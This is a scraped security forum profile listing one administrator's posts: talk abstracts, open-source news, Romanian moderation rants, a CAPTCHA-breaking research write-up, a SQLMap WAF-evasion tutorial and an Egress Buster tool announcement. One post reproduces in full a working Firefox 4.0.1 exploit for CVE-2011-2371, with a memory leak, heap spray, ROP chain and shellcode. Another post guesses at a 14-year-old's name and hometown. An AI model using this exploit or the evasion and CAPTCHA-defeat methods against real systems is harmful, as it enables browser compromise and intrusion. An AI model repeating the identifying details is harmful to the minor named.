Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18785

  • Joined

  • Last visited

  • Days Won

    738

 Content Type 

Everything posted by Nytro

  1. Nytro
    [h=4]Hitb2011Kul - Mobile Malware Analysis[/h] Description: Mobile Malware Analysis Sursa: Hitb2011Kul - Mobile Malware Analysis
  2. Nytro
    [h=4]Hitb2011Kul - Reverse Engineering Android Malware[/h] Description: Reverse Engineering Android Malware Android is growing at such an explosive rate, and users are storing an increasing amount of important data on their mobile phones, thus the platform is an attractive target for malware author. Malware author are aiming for users of Google's Android mobile operating system with a malicious application that harvests personal information, controlling the system and sends it to a remote server. By utilizing SMS toll fraud; malware author will also steal money from infected mobile phone. Malware infection on Android platform is going to be interesting in future (it's happening now!). Thus, reversing Android Malware (Droid-ware) is interesting challenge to address. Malware analysis can be performed using two approaches, which is Dynamic Analysis and Dead-Listing Analysis (Reverse Engineering). Reverse engineering is a vitally important skill for today's expert security professional. In this presentation, we'll focus on the later approach to analyze Android Malware. In this talk, the speaker will discuss on recent progress on Android malware scene. The speaker will provide details on few recent Android Malware samples. The speaker will also discuss on technical analysis on malicious Android applications by using reversing engineering approach. The analysis parts will focus on dissecting obfuscation such as encryption, string optimizing and generic obfuscation techniques applied inside Android Malware. The challenges when dealing with reversing Android Malware will be addressed as well. About Mahmud Ab Rahman Mahmud Ab Rahman currently works as Information Security Specialist for Malaysia Computer Emergency and Response Team (MyCERT) under umbrella of CyberSecurity Malaysia. Prior to that, he worked as an Intrusion Analyst at MyCERT department. His education background comprises of Master Degree in Computer Science from National University of Malaysia in 2006. Prior to that, he obtained a Degree in Computer Science from the same university. Mahmud has been involved in the computer security field for over 5 years. His area of focus and interest is network security, honeynet, botnet monitoring, and malware analysis. He also engages in several large scale penetration-testing exercises and to provide solutions for any vulnerability detected. Moreover, he is recognized for conducting numbers of training for organizations to talk on topics ranging from introduction to advanced security courses. He is a occasional speaker at conferences such as FIRST AGM, FIRST TC,Honeynet Annual Workshop and Infosec.MY. He currently certified for SANS's GPEN (gold) and GREM. Sursa: Hitb2011Kul - Reverse Engineering Android Malware
  3. Nytro
    [h=1]First beta for GNOME 3.4[/h]27 February 2012, 12:19 The GNOME project has released the first beta of GNOME 3.4, officially labelled GNOME 3.3.90 beta. This marks the development of the desktop environment moving into the home stretch and there should be no major changes from this point on because, among other things, the feature freeze was put in place a week ago. The first beta implements a range of improvements to the core components and applications that make up the GNOME desktop. For example, the updated version of NetworkManager includes basic support for VLANs and bonded network ports. The GNOME shell and screensaver now use systemd to obtain information on active users of the system and their input devices rather than, as at present, using ConsoleKit. The previously developed Redo function in Nautilus, the streamlined web browser, and the new virtualisation and remote desktop software, GNOME Boxes, are also part of the beta. According to the schedule, GNOME 3.4 is scheduled for release on 28 March. Before then, another beta and a release candidate will appear. (djwm) Sursa: First beta for GNOME 3.4 - The H Open Source: News and Features
  4. Nytro
    [h=2]New tool release – “Egress Buster” – Find outbound ports[/h]February 29th, 2012 A friend was recently on a penetration test and needed a port on the outside. I haven’t found any decent tools out there for finding what ports are allowed outbound to help with reverse shells and stuff like that so I wrote one real quick. Note that this was written in about 15 minutes and the code can absolutely be improved. I’ll probably go back and clean it up sometime. There are some limitations, for one, operating systems in general start to puke when you generate over a 1000 listeners, so you will need to test a 1000 at at time. Good news is the socket handlers are multi-threaded so you can cycle through about a 1000 ports in well under a minute. Here’s the general concept: You are on the inside network somehow and need to find what ports are allowed out to the Internet. There’s two main files/components – egressbuster and egress_listener. Egressbuster connects out on whatever ports you specify and tries to connect to an Internet facing computer thats running egress_listener. Very simple to run: On victim: egressbuster.exe example: egressbuster.exe 208.1.1.1 1-1000 In the above example, we specify a low port range and high port range, egressbuster will attempt to connect from port 1 to 1000 outbound to wherever the reverse_listener is. The listener: python egress_listener.py example: python egress_listener.py 1-1000 In the above example, we just specify what ranges we need to listen to. In the above example we listen from 1 to 1000 for incoming connections. When a connection is established, this is what you'll see on the listener side. 192.168.235.131 connected on port: 170 192.168.235.131 connected on port: 171 192.168.235.131 connected on port: 172 192.168.235.131 connected on port: 173 192.168.235.131 connected on port: 174 192.168.235.131 connected on port: 175 192.168.235.131 connected on port: 176 192.168.235.131 connected on port: 177 192.168.235.131 connected on port: 178 If your interested, download the byte compiled code and the python source here. Download: https://www.secmaniac.com/files/egressbuster.zip Sursa: https://www.secmaniac.com/blog/2012/02/29/new-tool-release-egress-buster-find-outbound-ports/
  5. Nytro
    Metasploit - Low Level View Saad Talaat (saadtalaat _ gmail.com) Forward Abstract: for the past decade (almost) Metasploit have been number one pentesting tool. A lot of plug-ins have been developed specially for it. However, the key-point of this paper is to discuss metasploit framework as a code injector and payload encoder. Another key-point of this paper is malware different forms and how to avoid anti-viruses which have been a pain for pentesters lately. And how exactly anti-malware software work. Introduction Evading anti-viruses have been a painful issue for pentesters for years. On the other hand a birth of an anti-virus evading technique means blackhats and skiddies will have another way to hack without being detected. Over the years metasploit framework have been working in one technique on evading anti-viruses which is encoding. For a year or two some encoding techniques worked fine. Nowadays It's nearly impossible to get encoded payload that evades anti-virus from metasploit's encoders no matter how many iterations you do. Download: [URL]http://cdn01.exploit-db.com/wp-content/themes/exploit/docs/18532.pdf[/URL]
  6. Nytro
    Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit <!--Full Exploit Code: http://www.exploit-db.com/sploits/18531.zip PoC exploit for CVE-2011-2371 tested against Firefox 4.0.1 md5 of mozjs.dll: 5d7ffcc9deb5bb08417ceae51d2afed4 change constants to switch between w7/xp. see my blog if you want to know how this works. http://gdtr.wordpress.com/2012/02/22/exploiting-cve-2011-2371-without-non-aslr-modules/ p_k twitter.com/pa_kt gdtr.wordpress.com --> <html> <script src="jspack.js"></script> <script> function hex(x){ var y = x.toString(16); y = "0x"+y; return y; } function itoa(i) { return String.fromCharCode(i); } // n - length in bytes (1 unicode char = 2 bytes) function puff(x, n){ while(x.length < n) x += x; return x.substring(0,n); } function arr2hex(tab){ var s = ""; for(var i in tab){ x = tab[i]; x = x.toString(16); if(x.length<2) x = "0"+x; s += x + " "; } return s; } function arr2ascii(tab){ var s = "" for(var i in tab){ x = tab[i]; if(0x20 <= x && x<=0x7f){ y = itoa(x); } else{ y = "."; } s += y; } return s; } function xchg(d,i,j){ t = d[i]; d[i] = d[j]; d[j] = t; } function bswap(d){ xchg(d, 0, 3); xchg(d, 1, 2); } function nicer(tab){ jsp = new JSPack(); res = []; for(var i in tab){ x = tab[i]; t = jsp.Pack("d", [x]); d1 = t.slice(0, 4); d2 = t.slice(4, 8); bswap(d1); bswap(d2); t = [d1,d2]; res = res.concat(t); } res = res.reverse(); return res; } function dw2int(d){ n = 0; for(var i=0;i<4;i++){ n *= 256; n += d[3-i]; } return n; } function convert(tab){ o = s = v = ""; for(var i in tab){ d = tab[i]; s += arr2hex(d); v += arr2ascii(d); if((parseInt(i)+1)%4==0){ o += s + " | " + v + "\n"; s = ""; v = ""; } } return o; } function check_pair(d1, d2){ var n1 = dw2int(d1); var n2 = dw2int(d2); if(n2-n1 == 0x304) return true; return false; } function find_mozjs_base(tab){ var n1 = 0; for(var i=0;i<tab.length-4;i++){ d1 = tab[i]; d2 = tab[i+1]; if(check_pair(d1,d2)){ n1 = dw2int(d1); n1 = n1 - 0x3cac; //n1 = mozjs .data n1 = n1 - 0x1B2000; //n1 = mozjs base break; } } return n1; } function d2u(dword){ var uni = String.fromCharCode(dword & 0xFFFF); uni += String.fromCharCode(dword>>16); return uni; } function odd_d2u(d1, d2){ uni = String.fromCharCode((d1&0xFF)<<8); uni += String.fromCharCode((d1>>8)&0xFFFF); uni += String.fromCharCode((d1>>24)+((d2 & 0xFF)<<8)); //1+1<<8 == 512 in JS T_T uni += String.fromCharCode((d2>>8)&0xFFFF); uni += String.fromCharCode(d2>>24); return uni; } // generated with mona.py function rop_chain(mozjs_base){ var arr = [ mozjs_base + 0x000c96e6, // POP EAX // RETN [mozjs.dll] mozjs_base + 0x0015d054, // ptr to &VirtualAlloc() [IAT mozjs.dll] mozjs_base + 0x00028510, // MOV EAX,DWORD PTR DS:[EAX] // RETN [mozjs.dll] mozjs_base + 0x0014293c, // XCHG EAX,ESI // RETN [mozjs.dll] mozjs_base + 0x0014d00d, // POP EBP // RETN [mozjs.dll] mozjs_base + 0x000d7ee2, // & push esp // ret 04 [mozjs.dll] mozjs_base + 0x000be327, // POP EBX // RETN [mozjs.dll] 0x00000001, // 0x00000001-> ebx mozjs_base + 0x0004f422, // POP EDX // RETN [mozjs.dll] 0x00001000, // 0x00001000-> edx mozjs_base + 0x000b1421, // POP ECX // RETN [mozjs.dll] 0x00000040, // 0x00000040-> ecx mozjs_base + 0x000062e3, // POP EDI // RETN [mozjs.dll] mozjs_base + 0x0000f005, // RETN (ROP NOP) [mozjs.dll] mozjs_base + 0x000652f0, // POP EAX // RETN [mozjs.dll] 0x90909090, // nop mozjs_base + 0x001372bd // PUSHAD // RETN [mozjs.dll] ]; return arr; } function tab2uni(tab){ var uni = "" for(var i=0;i<tab.length;i++){ uni += d2u(tab[i]); } return uni; } function spray(mozjs_base, h1_s, hsize) { function rva2va(addr) { return addr+mozjs_base; } function rva2d(addr) { return d2u(rva2va(addr)); } var align = 0x100000; var tab_offset = 0x1000; var TYPE_OBJECT = "%u0007%uffff"; var pivot_rva = 0x1a21c; // 0x68e7a21c : # ADD EBP,EBX # PUSH DS # POP EDI # POP ESI # POP EBX # MOV ESP,EBP # POP EBP # RETN var mov_esp_ebp_rva = 0x1a222; // mov esp, ebp # pop ebp # ret var h2_s = h1_s + hsize; var h2_middle = (h2_s + hsize/2) & (~(align-1)); //align //mov eax,dword ptr [edi+64h] ;edi=[h2_ptr+4], later: call eax var h2_ptr = h2_middle + tab_offset; var off1 = h2_ptr; var off2 = h2_ptr-0x64; var v1 = d2u(off1); var h1_fill = unescape(v1+TYPE_OBJECT); var foo = puff(h1_fill, 0x4000); var h1_spray = foo.substring(0,(0x4000/2)-2); var pivot_va = rva2va(pivot_rva); pivot_va = d2u(pivot_va); off2 = d2u(off2); var new_ebp = h2_ptr+18; var mov_esp_ebp_va = rva2va(mov_esp_ebp_rva); var set_esp = odd_d2u(new_ebp, mov_esp_ebp_va); var rop = tab2uni(rop_chain(mozjs_base)); //shellcode by skylined var msgbox_shellcode = "%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%ue367%u8bec%u207b%uef01%u7c8b%ufc8f%uef01%uc031%u3299%u6617%ucac1%uae01%uf775%u8166%u2afa%u74b6%u6609%ufa81%u1aaa%udbe0%uc575%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u8597%u74f6%u6812%u3233%u2020%u7568%u6573%u5472%ud5ff%u3195%uebf6%u56a3%u3168%u0021%u6800%u322d%u3733%u3268%u3130%u6831%u7663%u2d65%u8754%u2404%u5050%uff56%uccd5"; var x = unescape(pivot_va+off2+set_esp+"%u1111%u2222"+rop+msgbox_shellcode); x = puff(x, 0x4000); var h2_spray = x.substring(0,(0x4000/2)-2); var spray_tab = new Array(); for (i=0;i<0x1000;i++){ spray_tab[i] = h1_spray+"1"; spray_tab[i].indexOf("zzz"); } for (i=0x1000;i<0x2000;i++){ spray_tab[i] = h2_spray+"2"; spray_tab[i].indexOf("zzz"); } } var exploit_func = function bleh(prev, current, index, array) { //boom = typeof current; current[4] = 1; // add ebp, ebx, where ebx=2*4+1=9 //throw "up"; } function trigger(func, arr_len){ xyz.length = arr_len; try{ xyz.reduceRight(func,1,2,3); } catch(e){ } } function leak(){ var CHUNK_SIZE = 0x1000; var leak_arr_len = 0xffffffff; mem = []; count = 0; var leak_func = function bleh(prev, current, index, array) { if(typeof current == "number"){ mem.push(current); } count += 1; if(count>=CHUNK_SIZE/8){ throw "lol"; } } function dump_mem(leak_f, arr_len){ var dump = document.getElementById("dump"); var mozjs_base = 0; for(var i=0;;i++){ mem = []; count = 0; trigger(leak_f, arr_len); mem = nicer(mem); s = convert(mem); dump.innerHTML = s; //alert("leaked bytes: "+hex(mem.length*4)); mozjs_base = find_mozjs_base(mem); //alert("mozjs base: "+hex(mozjs_base)); if(mozjs_base != 0){ break; } } return mozjs_base; } var base = dump_mem(leak_func, leak_arr_len); return base; } function go(){ //var arr_ptr = 0x05000000; //(xp sp3) //var h1_s = 0x05b00000; //var h2_e = 0x0fb00000; var arr_ptr = 0x0b000000; //w7 var h1_s = 0x0b500000; var h2_e = 0x16e00000; var size = h2_e-h1_s; var hsize = size/2; var h1_middle = h1_s+hsize/2; var exp_arr_len = (h1_middle - arr_ptr)/8 + 0x80000000; var mozjs_base = leak(); spray(mozjs_base, h1_s, hsize); alert("ready"); while(1){ trigger(exploit_func, exp_arr_len); exp_arr_len -= 0x500; } } // globals var xyz = new Array(); </script> <body> <input type="button" value="go" onclick="go()" /> <pre id="dump"> </pre> </body> </html> Sursa: Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit
  7. Nytro
    Cei cu crash-ul, ia sa vad, cum crashuiti voi Chrome? Scrieti o pagina HTML sau un cod Javascript care sa crashuiasca Chrome...
  8. Nytro
    Si cica Parlamentul European vrea sa opreasca aceste "atacuri" pentru A PROTEJA DREPTURILE PROGRAMATORILOR, cand ei ofera o gramada de bani tocmai pentru a "incalca" acest drept. Muie parlamentarilor de peste tot. Sunt foarte mici sansele sa reuseasca cineva ceva. Doar cei de la VUPEN au reusit, unde sunt oameni cu adevarat "bazati", oameni care castiga rapid acei 60.000 de dolari si care poate nici nu s-ar obosi sa se deplaseze pentru aceasta suma.
  9. Nytro
    Banul nu se scoate indiferent cati "prieteni" de pe messenger de-ai tai s-ar da cu curul de paman. Moderatorii nu o sa scoata banul pentru ca raman fara moderator. Iar tu ban, sunt interzise conturile multiple, si mi se lua de acest tam-tam. Daca se mai trezeste unul sa comenteze urmeaza pe lista de banati. Nu va convine va dati cu curul de pamant.
  10. Nytro

    abuz

    Nytro replied to vafutrts's topic in Cosul de gunoi

    Nu stiu cine esti si de ce ai postat aici, nu iti dadeam ban, dar e RST nu RTS, asa ca "La revedere".
  11. Nytro
    Muie Parlamentului European. Daca ma gandesc la Romania, ce astfel de parlamentari are, orice cuvinte sunt inutile... Astia sunt prosti de bubuie. Practic "programatorii" nu vor aceste legi tampite, NU e spre binele lor, e inca o tentativa de control in masa.
  12. Nytro
    ID: mafteiliviu14, deci il cheama Mafei Liviu si are 14 ani (sunt un geniu, stiu) si e din Neamt, comuna Urecheni. De ce nu fac cacaturi ca acesta oameni din Bucuresti, sa putem merge peste ei acasa?
  13. Nytro
    Thanks. O recomand tuturor care au o parere buna despre ei, e demonstratia perfecta pentru ceea ce inseamna hacking. PS: Daca vreti cartea (tiparita) dati si voi o bere si o imprumut.
  14. Nytro

    Doar o informatie

    Nytro replied to Nytro's topic in Off-topic

    Nu e nevoie sa posteze, vreau doar sa citeasca, si sa realizeze ca dupa 13 ani de la aparitia acestui fenomen, au inceput sa apara persoane auto-intitulate "hackeri" doar pentru ca presupun ca inteleg aceasta tehnica. O sa postez diseara niste articole interesante, sa inteleaga lumea ca la capitolul SQLI suntem cu vreo 8 ani in urma...
  15. Nytro
    Descarcam si eu cand nu aveam ce face: Mirror: [URL]https://rstcenter.com/videos/Debugging/[/URL]
  16. Nytro
    On Christmas day, 1998 Phrack 54 was issued. Phrack[1], is a “Hacker magazine written by the community, for the community”. It is an excellent source of technical security information and in this particular edition, 54, there was an article entitled “NT Web Technology Vulnerabilities” written by rfp – or rain forest puppy. Amongst other things this article described a number of attacks that employed SQL injection, though at no point is this term used in the article. rfp discusses IDC and ASP applications running on Microsoft’s Internet Information Server feeding into SQL Server 6.5. This article is the first real public outing of SQL injection – it just wasn’t called SQL injection at that time. That would come later. Next of note was a security advisory published by Allaire[2] on February the 4th 1999, a little over a month after rfp’s article. The security bulletin discusses the threat posed by “Multiple SQL Statements in Dynamic Queries”. Link: http://phrack.org/issues.html?issue=54&id=8#article Cititi, si nu uitati ca a fost scris in 1998...
  17. Nytro
    [h=1]Intel Joins LibreOffice[/h] Thu, 2012-02-23 09:52 by Swapnil Bhartiya The month of February is a month to remember for the LibreOffuce project. They formally incorporated the foundation in Berlin, released 3.5 with major changes and now Intel is joining the foundation as a member. Intel will also make available the LibreOffice for Windows from SUSE in Intel AppUp center. Intel AppUp Center is an online repository designed for Intel processor-based devices. "I have been using LibreOffice from day one for presentations at conferences and for data analysis," said Dawn Foster, open source community lead, Intel. "Our engineers have worked with the LibreOffice codebase to optimise it for Intel hardware. Adding it to the AppUp? Center is an obvious extension, and will provide an exciting feature for all Ultrabook users." "We are thrilled to add Intel to our existing roster of supporters", said Florian Effenberger, volunteer and TDF board member, "TDF is first and foremost a vendor neutral project committed to excellence in the office suite space, but we greatly value the support and advice we gain from organisations such as SUSE, Red Hat, Google, the Free Software Foundation (FSF) and Software in the Public Interest (SPI)." LibreOffice has put open source office suite in direct competition with Microsoft's own offering. OpenOffice suffered stagnation and did not see any innovation or improvement for a long time. Sursa: Intel Joins LibreOffice | Muktware
  18. Nytro
    E vorba de fusul orar. GMT vs GMT + 2. Nu e nimic complicat...
  19. Nytro
    Se aproba https://rstcenter.com/forum/search.php?do=finduser&userid=51601&starteronly=1&contenttype=vBForum_Thread
  20. Nytro
    Citesti codul sursa, intelegi ce face, il compilezi si il executi cu parametri corespunzatori.
  21. Nytro
    Ban. Sa nu va mai prind cu astfel de rahaturi pe aici.
  22. Nytro
    Update: A look at ASLR in Android Ice Cream Sandwich 4.0 How we broke the NuCaptcha video scheme and what we propose to fix it Mozilla Releases Firefox 10.0.2 for png Flaw Keylogger poses as Facebook and Microsoft, steals login credentials Direct Shellcode Execution via MS Office Macros with Metasploit Hunting & Exploiting Directory Traversal Ubuntu 12.04 LTS Gets HUD Interface Trend Micro Releases HijackThis Source Code to sourceforge.net Google Chrome update fixes high-severity vulnerabilities and patches Flash Player Hacking / Exploiting / Cheating in Online Games Many roads to IAT Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability BA / Exploit (MS11-021) Exploiting CVE-2011-2140 another flash player vulnerability [unix/Solaris] Structura fizica/logica disk-uri (system level) RudraScript .. Run code in every language from inside Lua scripts. Cand am timp ma mai ocup si mai postez, doar ca nu prea am mai avut timp. Pagina: https://www.facebook.com/rstforum https://www.facebook.com/rstforum
  23. Nytro
    [h=1]How we broke the NuCaptcha video scheme and what we propose to fix it[/h] Feb, 17 2012 | Security | Elie | No comments NuCaptcha is the first widely deployed video captcha scheme. Since Technology Review interviewed me about NuCaptcha in October 2010, I have been working on evaluating its security and usability. In this blog post, I will discuss how we are able to break the current version of NuCaptcha with >90% success and also discuss a possible approach to fix them. Our fix is based on a new design principle called tracking resistance . Intuitively tracking resistance means you had object that have the same properties than the real captcha so the algorithm don’t know which object in the video he should track. When successfully implemented, tracking resistance makes video captcha secure against vision/machine learning attacks and more secure than standard text-based captchas. I have been working on NuCaptcha security with many people over the last year and half, including Matthieu Martin, Shang Ping, Jonathan Aigrain, Mike Bailey and John Mitchell. [h=2]Responsible disclosure[/h] Before getting started, it is important to mention that this post is a responsible disclosure: I have been in contact with the CEO of NuCaptcha for a couple of months now and have shared with him the result of our research way ahead of time, so they had plenty of time to get ready for this post (you can read their answer here) I also want to emphasize that the goal of this post is not to demo another cool attack (even though the algorithm is pretty nifty). Rather, I want to start an open discussion on the viability of our tracking resistance principle and to allow everyone to contribute to making video captchas a viable alternative to more traditional captcha schemes. [h=2]Feedback Welcome[/h] While discussing ongoing research (that is, before a research paper is accepted or submitted) is unorthodox in the security community, the numerous interactions I’ve had with various companies over the last 3 years made me realize many people rely on research results to design captchas. In this context, it is our duty to provide them the best and most secure design guidelines possible. I strongly believe in the example set by the cryptography community, that the best security is achieved through an open process and not with secrecy or isolation. Accordingly, this post summarizes our understanding of video captcha security and the reasoning that leads us to believe that tracking resistance is the best principle to make video captcha secure. The most difficult part of this research turned out not to be breaking NuCaptcha, which I’ve known how to do since December 2010, but rather to come up with the right abstraction to explain why video captchas might offer better security that image captchas and to synthesize where the extra security comes from. With this in mind let’s get started on how to break NuCaptchas before discussing how to make them secure. [h=2]The NuCaptcha Scheme[/h] There are currently two different versions of NuCaptcha: a ‘simple’ version and the ‘standard’ version. The simple version looks like this: The standard version looks like this: As visible in the screenshot, the standard version differs from the simple version by a text animation from right to left. The user is then asked to enter the last word in the input box in the standard version. This scheme has multiple levels of security: In its easiest version the letters of the last word are in red, in the hard version the letters are in black and more heavily distorted. According to the site documentation, NuCaptcha uses a reputation algorithm to decide which version you get. Under the hood the NuCaptchas are short video files that contains about 500 frames. [h=2]Which version to evaluate?[/h] Since our technique successfully breaks the simple and the standard version of NuCaptcha, I am going to stick with the standard version because I believe that motion is the key feature to create a secure video captcha. To keep things fair, we are also going to focus on breaking the hard version and not rely on any of the advantages provided by having the letter in red or having them less distorted. [h=2]Background customization[/h] NuCaptcha allows users to choose between various background to customize their captchas. However, as we showed at CCS last year (available here) in our paper on breaking and securing text captchas, removing the background is fairly easy with the right algorithm so we are going to stick with the default one. Regardless of the background chosen, but our attack still applies. [h=2]Attack algorithm overview[/h] Overall, breaking a NuCaptcha captcha is done by accomplishing the 5 phases depicted in the diagram below. The attack algorithm assumes NuCaptchas that have been converted into frames. This step can be trivially executed using off-the-shelf software, so we will not discuss it here. The pre-processing phase involves removing the background and binarizing the captcha in black and white so it is easier to process. The frame analysis phase is then used to find the object in each frame can potentially be the captcha. The cross-frame analysis phase combines the frame analysis results to isolate the set of frames where the actual captcha is present. The segmentation phase aims at separating the captcha letters. As we will see there are a couple of ways to do this–having multiples distortions of the same captcha actually gives us an opportunity to be more efficient at segmentation than with a standard captcha. Finally, the recognition phase is used to recognize each letter individually using a machine learning algorithm. [h=4]How does it compare to standard text-based captchas[/h] Compared to breaking image-based captchas, attacking video captchas is both harder and easier. It is harder because motion tracking is necessary to isolate the frames that contains the actual captcha. It is easier because being able to analyze multiple copies of the same captcha can boost the accuracy of the segmentation phase. Since the pre-processing part and the recognition part are very well understood and use well-known techniques, I am going to skip them to keep this blog post shorter. If you are interested in the subject or need a refresher, please read my paper on attacking image-based captchas (available here). [h=2]Finding the captcha[/h] Before we can attempt to segment the captcha, we first need to find the frames in which it appears. We assume that each NuCaptcha has a different starting point in the animation, as we want our attack to be robust and not to rely on easily fixable features. Our first task is thus to isolate the frames that contain the captcha itself, and within these frames isolate the captcha from other words that appear. To achieve this we track and analyze the words moving in the captcha using image and motion tracking. Our captcha isolation technique works backward and is done in two steps: First we isolate the most interesting object in each frame (see next section), then we track theses objects across multiple frames and keep the set of 50 frames that contain the overall most interesting object. [h=2]Frame analysis: finding the most interesting object[/h] We relying two type of image analysis to isolate the most interesting object in each frame: a bounding box shape analysis, and an interest points (SIFT algorithm) density evaluation. An example of a frame where the object bounding boxes (the yellow squares), and object interests points (purple crosses) are computed is visible on the screenshot below: Based on these features, we found two ways to select the most interesting object: First, we look at the bounding box shape ratio width/height. Because the captcha is 4 letters long, we use a heuristic that the bounding box must have a width/height ratio of greater than 1. We then discard every bounding box that is above or below certain thresholds, as we roughly know what the expected ratio is after looking at a couple of captchas. Second, we look at the SIFT (Scale-invariant feature transform) interest points density by bounding box. As visible on the screenshot above, the captcha bounding box contains more interesting points that the other boxes. This is explained by the fact that the captcha letters are rotated independently and therefore have more ‘edges/corners’ than straight letters. The fact that the letters are rotated also implies that for the real captcha the interests points are scattered all over the box. On the other boxes the interest points are mostly nears the edges because the letters are straight. We aggregate theses two observations (more points, more scattering) into a density metric D that will be used to select the most interesting object. The metric D is computed as follows: D = Sum(1/distance(p_1, box_center)) where distance is the Euclidean distance and p_1 is each interest point. Basically, D calculates a weighted-sum of all the interest points by giving more weight to the interest points closer to the center of the box. Combining these two techniques allow us to isolate the most ‘interesting’ object in each frame, by removing the objects below or above the bounding box thresholds and picking up the object for which D is the highest. The result of this selection algorithm for our example fame is visible on the screenshot below (Den being the value of the metric D for the given box): [h=2]Cross-frames analysis: finding the captcha[/h] Being able to isolate interesting objects is not good enough because in some frames the captcha will not be present. To isolate the set of frames where the most interesting object is the real captcha, we use the features extracted during the frame analysis step to do a “cross-frame analysis.” Our cross-frame algorithm works by computing a sliding window over the density metric D on 50 frames. As visible on the screenshots below, where the D value of the window is represented in the red curve, there is a clear spike when the captcha is displayed. So all we have to do is keep the highest spike (which encompass 50 frames) and discard the remaining frames. [h=3]Segmenting the captcha[/h] The previous step identified 50 frame containing the captcha, giving us 50 instances of the same captchas that are slightly different (each letter is being animated independently). Here is an example: We can exploit these multiple variations of the same captcha in three different ways to help segment the captcha into individual letters. First we can try to find an instance where all the letters are disjoint, making the segmentation trivial with a clustering algorithm. While we did found some instances where this is the case, this is not a good approach as it is unreliable and can be patched very easily. The second approach is to try Decaptcha (our captcha tool) on every instance, and uses a voting decision to select the most probable answer. Using this approach, Decaptcha gives a 83% success rate on NuCaptchas. Here is an example of some of the clusters we have on a given NuCaptcha. It can be seen that than some of them are better segmented than others and therefore easier to recognize. It is likely possible to improve the effectiveness of this approach by factoring the confidence of the classifier in the voting procedure, but since the results with simple voting were already good enough to prove NuCaptcha vulnerable, we ended up not pursing this direction. A third approach to get close to 100% success rate is to use motion tracking (optical flow) to segment the letters. This approach uses a two-step algorithm. First, we compute the interest points in each frame and then track them across frames. You can see an example of this step on the screenshot below: Second, we compute a distance matrix (using a RANSAC algorithm) to analyze which interest points move together, defined as their relative distance staying almost constant. Each group of points that moves together makes up a cluster that represents a letter. We can use these points to know where each letter starts and ends and to perform segmentation, which we show in the screenshots below. Since matching corresponding interest points between frames is never perfect, sometime we have very good results and sometime bad ones. However, since we track letter movements between pair of frames (the frame and the frame + 5) we have a lot of candidates to choose from, and we only need one good match to be successful. This discrepancy between the quality of the matches is illustrated on the screenshot below: The left side depict an example where the tracking has generated 6 clusters that are not very accurate. The example on the right shows a successful clustering based on the distance matrix data. Even though the E, A, and, P are collapsed we are able to almost perfectly separate them using the distance matrix. [h=4]Synthesizing the problem[/h] To summarize, animating the captcha allows the attacker to do a “differential” analysis that helps the attack be more efficient. On the other hand, not animating the captcha is equivalent to having a static (text-based) captcha renders moot any security advantage of using a video captcha. [h=2]Toward secure video captcha[/h] So are video captchas worthless? No, but it requires a lot of out of the box thinking for us to find a way out. It took us significantly longer to understand the root of the problem and how to solve it than to break the current NuCaptcha scheme. Once we have accepted the fact that the segmentation resistance for video captchas will be equivalent or lower than a standard text-based captcha(as explained above), it becomes clear that the extra-security provided by using a video captcha needs to come from somewhere else–We have to find a hard vision problem to rely upon. Trying to prevent the computer from finding moving objects using a ‘confusing/moving background’ is a lost cause. The computer vision field has devised very efficient algorithms (optical flow algorithm) that are likely to destroy any attempts in this direction. On the other hand, it seems possible to make the isolation of the correct moving object very difficult. What we need to do is to remove every discriminative feature (or invariants as Jeff Yan calls them) that the attacker can use to tell apart decoy moving objects and the real captchas. For example our attack relies on two discriminative features to isolate the captchas: the number of interest points and the shape of the bounding box. Both of these features can be nullified by adding (moving) decoys that exhibit the same properties. [h=2]NuCaptcha Response[/h] As I said in the introduction, we notified NuCaptcha on November 21st, 2011 informing them we had an attack against their current scheme and iterated with them until December 15th 2011. On February 7th we wrote this blog post and shared it with them. At this time, they provided us an official answer that you can read here. Their answer contains two mains points regarding the attack. First on page one, they state, that they have a harder version that add more distortions and where the letters are more crowded. When scraping their API, we emulate the behavior of a real bot by aggressively timing our requests. While we believe we got the version that a standard attacker might get (which is already harder than the version displayed on site), we have not evaluated the hard version referenced in their response. With respect to the difficulty of their hard CAPCHA, I don’t believe that these heavier distortions are an efficient defense because even if the letters are more crowded, it should not impact an optical flow algorithm used to separate the letters. Further, I belive the heavier distortions should not be an issue for the recognition phase as it is well known since 2005 that computers beat human when it comes down to recognizing a single heavily distorted character. The solution proposed by NuCaptcha. Image taken from their response. Regarding their fix, they propose adding inter-frame manipulation (see screenshot above ) which should mess-up our optical flow analysis by throwing of our distance matrix. I won’t be able to characterize the effectiveness of this technique until they roll out their changes and I can test it. My guess is that it is somewhat less effective, based on the fact than in cryptography adding noise to prevent side-channel attacks has been known to be ineffective (The canonical example being the differential power analysis attack (DPA) by Paul Kocher), but again will withhold judgement until we can test. [h=2]Toward secure video captcha[/h] It is likely that there are features other than the two we used that can be abused by an attacker to break tracking resistance. This is why, following the good practices pioneered by the cryptography community, we decided to ask for your help to find them This post openly discusses what we already know about video captcha security. We hope this is the first step in an evaluation process dedicated to make the video captcha tracking resistance a viable option. I will also discuss this attack in my upcoming RSA talk about captchas in February, so if you are around, I would be happy to discuss it. Sursa: How we broke the NuCaptcha video scheme and what we propose to fix it @ From Information to Intelligence
  24. Nytro
    [h=1]SQLMap Tamper Scripts[/h] Web Application Firewalls have become the new security solution for several businesses. Many companies often ignore the actual vulnerabilities and merely rely on the firewall for protection. Regrettably, most, if not all firewalls can be bypassed. In saying this, my post will demonstrate how to use some of SQLMap’s new features to bypass WAFs/IDSs. I have recently had the pleasure of working on a few tamper scripts for SQLMap, which can be found in the latest development version from the subversion repository. svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev The focus of the tamper scripts is to modify the request in a way that will evade the detection of the WAF (Web Application Firewall) rules. In some cases, you might need to combine a few tamper scripts together in order to fool the WAF. For a complete list of the tamper scripts, you can refer to https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/ The first scripts I’ll demonstrate are space2hash.py and space2morehash.py which work with MySQL (still haven’t gotten around to the MSSQL one). These scripts will convert all spaces to block comments with random text. The extended version of the script (space2morehash.py) will also add the comments in between certain function names and the parenthesis. To get started using the tamper scripts, you use the –tamper switch followed by the script name. In my example I’m using the following command: ./sqlmap.py -u http://192.168.0.107/test.php?id=1 -v 3 